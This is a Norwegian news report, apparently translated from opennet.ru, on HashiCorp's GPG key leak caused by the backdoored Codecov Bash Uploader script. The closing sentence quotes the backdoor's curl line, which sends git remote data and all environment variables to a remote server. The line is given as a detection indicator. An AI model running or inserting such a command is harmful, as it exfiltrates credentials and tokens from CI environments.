HashiCorp, kjent for å utvikle open source-verktøyene Vagrant, Packer, Nomad og Terraform, annonserte lekkasjen av den private GPG-nøkkelen som brukes til å lage digitale signaturer som bekrefter utgivelser. Angripere som fikk tilgang til GPG-nøkkelen kan potensielt gjøre skjulte endringer i HashiCorp-produkter ved å verifisere dem med en korrekt digital signatur. Selskapet opplyste samtidig at det under tilsynet ikke ble påvist spor etter forsøk på slike modifikasjoner.
For øyeblikket er den kompromitterte GPG-nøkkelen tilbakekalt og en ny nøkkel er introdusert i stedet. Problemet påvirket kun verifisering ved bruk av filene SHA256SUM og SHA256SUM.sig, og påvirket ikke genereringen av digitale signaturer for Linux DEB- og RPM-pakker levert gjennom releases.hashicorp.com, samt utgivelsesbekreftelsesmekanismer for macOS og Windows (AuthentiCode) .
Lekkasjen oppsto på grunn av bruken av Codecov Bash Uploader (codecov-bash)-skriptet i infrastrukturen, designet for å laste ned dekningsrapporter fra kontinuerlige integrasjonssystemer. Under angrepet på Codecov-selskapet ble det gjemt en bakdør i det spesifiserte skriptet, der passord og krypteringsnøkler ble sendt til angripernes server.
For å hacke utnyttet angriperne en feil i prosessen med å lage Codecov Docker-bildet, som tillot dem å trekke ut tilgangsdata til GCS (Google Cloud Storage), nødvendig for å gjøre endringer i Bash Uploader-skriptet distribuert fra codecov.io nettsted. Endringene ble gjort tilbake 31. januar, forble uoppdaget i to måneder og tillot angripere å trekke ut informasjon som er lagret i kundemiljøer for kontinuerlige integreringssystem. Ved å bruke den ekstra ondsinnede koden kunne angripere få informasjon om det testede Git-depotet og alle miljøvariabler, inkludert tokens, krypteringsnøkler og passord sendt til kontinuerlige integrasjonssystemer for å organisere tilgang til applikasjonskode, repositorier og tjenester som Amazon Web Services og GitHub.
I tillegg til den direkte samtalen, ble Codecov Bash Uploader-skriptet brukt som en del av andre opplastere, som Codecov-action (Github), Codecov-circleci-orb og Codecov-bitrise-step, hvis brukere også er berørt av problemet. Alle brukere av codecov-bash og relaterte produkter anbefales å revidere infrastrukturen deres, samt endre passord og krypteringsnøkler. Du kan sjekke tilstedeværelsen av en bakdør i et skript ved tilstedeværelsen av linjen curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || ekte
Kilde: opennet.ru